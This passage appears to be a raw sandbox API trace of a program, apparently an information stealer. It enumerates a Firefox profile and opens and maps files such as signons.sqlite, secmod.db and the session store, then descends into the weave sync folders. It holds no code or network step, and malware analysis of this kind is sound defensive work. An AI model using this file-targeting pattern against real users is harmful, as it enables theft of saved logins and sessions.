| out: lpFindFileData=0x52daf0) returned 1 [0590.988] lstrlenW (lpString="\\") returned 1 [0590.988] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.988] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.988] lstrlenW (lpString="secmod.db") returned 9 [0590.988] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.989] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bbf0 [0590.989] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.989] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.989] CloseHandle (hObject=0x660) returned 1 [0590.989] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x56 [0590.989] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bd28 [0590.989] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db", lpDst=0x63bd28, nSize=0x56 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db") returned 0x56 [0590.989] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.989] CloseHandle (hObject=0x660) returned 1 [0590.989] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.989] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4000 [0590.989] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.989] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.989] LocalFree (hMem=0x63bd28) returned 0x0 [0590.989] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.989] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.989] lstrlenW (lpString="\\") returned 1 [0590.989] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.989] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.989] lstrlenW (lpString="sessionstore.bak") returned 16 [0590.989] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.989] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56cab0 [0590.989] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.990] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.990] CloseHandle (hObject=0x660) returned 1 [0590.990] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5d [0590.990] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x5dbdf0 [0590.990] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak", lpDst=0x5dbdf0, nSize=0x5d | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak") returned 0x5d [0590.990] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.990] CloseHandle (hObject=0x660) returned 1 [0590.990] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.990] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbba [0590.990] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.990] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.990] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.990] LocalFree (hMem=0x56cab0) returned 0x0 [0590.990] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.990] lstrlenW (lpString="\\") returned 1 [0590.990] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.990] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.990] lstrlenW (lpString="sessionstore.js") returned 15 [0590.990] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.990] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56cab0 [0590.990] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.990] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.990] CloseHandle (hObject=0x660) returned 1 [0590.990] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5c [0590.990] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x5dbdf0 [0590.990] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js", lpDst=0x5dbdf0, nSize=0x5c | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js") returned 0x5c [0590.991] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.991] CloseHandle (hObject=0x660) returned 1 [0590.991] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.991] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x23c [0590.991] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.991] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.991] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.991] LocalFree (hMem=0x56cab0) returned 0x0 [0590.991] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.991] lstrlenW (lpString="\\") returned 1 [0590.991] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.991] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.991] lstrlenW (lpString="signons.sqlite") returned 14 [0590.991] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.991] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.991] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.991] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.991] CloseHandle (hObject=0x660) returned 1 [0590.991] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.991] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5dbdf0 [0590.991] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", lpDst=0x5dbdf0, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite") returned 0x5b [0590.991] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.991] CloseHandle (hObject=0x660) returned 1 [0590.991] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.992] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x50000 [0590.992] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.992] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x24c0000 [0590.995] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.995] lstrlenW (lpString="\\") returned 1 [0590.995] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.995] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.995] lstrlenW (lpString="times.json") returned 10 [0590.995] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.995] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x63bbf0 [0590.995] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.995] CloseHandle (hObject=0x660) returned 1 [0590.995] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x57 [0590.995] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x63bd28 [0590.995] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json", lpDst=0x63bd28, nSize=0x57 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json") returned 0x57 [0590.995] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.995] CloseHandle (hObject=0x660) returned 1 [0590.995] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.995] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1d [0590.995] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.995] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.996] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.996] lstrlenW (lpString="\\") returned 1 [0590.996] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.996] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.996] lstrlenW (lpString="urlclassifierkey3.txt") returned 21 [0590.996] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.996] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x63f8c8 [0590.996] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.996] CloseHandle (hObject=0x660) returned 1 [0590.996] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x62 [0590.996] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x63fa18 [0590.996] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt", lpDst=0x63fa18, nSize=0x62 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt") returned 0x62 [0590.996] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.996] CloseHandle (hObject=0x660) returned 1 [0590.996] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.996] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9a [0590.996] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.996] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.996] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.996] lstrcmpiW (lpString1="weave", lpString2=".") returned 1 [0590.996] lstrcmpiW (lpString1="weave", lpString2="..") returned 1 [0590.997] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.997] lstrlenW (lpString="\\") returned 1 [0590.997] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.997] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.997] lstrlenW (lpString="weave") returned 5 [0590.997] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.997] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x63bbf0 [0590.997] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\*.*", lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 0x5b9b50 [0590.997] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.997] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 1 [0590.997] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.997] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.997] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 1 [0590.997] lstrcmpiW (lpString1="changes", lpString2=".") returned 1 [0590.997] lstrcmpiW (lpString1="changes", lpString2="..") returned 1 [0590.997] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.997] lstrlenW (lpString="\\") returned 1 [0590.997] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.997] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x63be60 [0590.997] lstrlenW (lpString="changes") returned 7 [0590.997] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0590.997] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.997] LocalFree (hMem=0x63be60) returned 0x0 [0590.997] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0590.997] lstrlenW (lpString="\\*.*") returned 4 [0590.997] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0590.997] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x5dbdf0 [0590.997] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes\\*.*", lpFindFileData=0x52d600 | out: lpFindFileData=0x52d600) returned 0x5b9b10 [0590.997] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.997] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d600 | out: lpFindFileData=0x52d600) returned 1 [0590.997] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.997] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.997] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d600 | out: lpFindFileData=0x52d600) returned 0 [0590.997] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0590.997] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.997] LocalFree (hMem=0x56cab0) returned 0x0 [0590.997] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 1 [0590.997] lstrcmpiW (lpString1="failed", lpString2=".") returned 1 [0590.998] lstrcmpiW (lpString1="failed", lpString2="..") returned 1 [0590.998] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.998] lstrlenW (lpString="\\") returned 1 [0590.998] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.998] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x63be60 [0590.998] lstrlenW (lpString="failed") returned 6 [0590.998] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0590.998] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.998] LocalFree (hMem=0x63be60) returned 0x0 [0590.998] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0590.998] lstrlenW (lpString="\\*.*") returned 4 [0590.998] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0590.998] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x5dbdf0 [0590.998] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed\\*.*", lpFindFileData=0x52d600 | out: lpFindFileData=0x52d600) returned 0x5b9b10 [0590.998] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.998] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d600 | out: lpFindFileData=0x52d600) returned 1 [0590.998] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.998] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.998] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d600 | out: lpFindFileData=0x52d600) returned 0 [0590.998] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0590.998] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.998] LocalFree (hMem=0x56cab0) returned 0x0 [0590.998] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 1 [0590.998] lstrcmpiW (lpString1="toFetch", lpString2=".") returned 1 [0590.998] lstrcmpiW (lpString1="toFetch", lpString2="..") returned 1 [0590.998] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.998] lstrlenW (lpString="\\") returned 1 [0590.998] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.998] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x63be60 [0590.998] lstrlenW (lpString="toFetch") returned 7 [0590.998] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0590.998] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.998] LocalFree (hMem=0x63be60) returned 0x0 [0590.998] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0590.998] lstrlenW (lpString="\\*.*") returned 4 [0590.998] 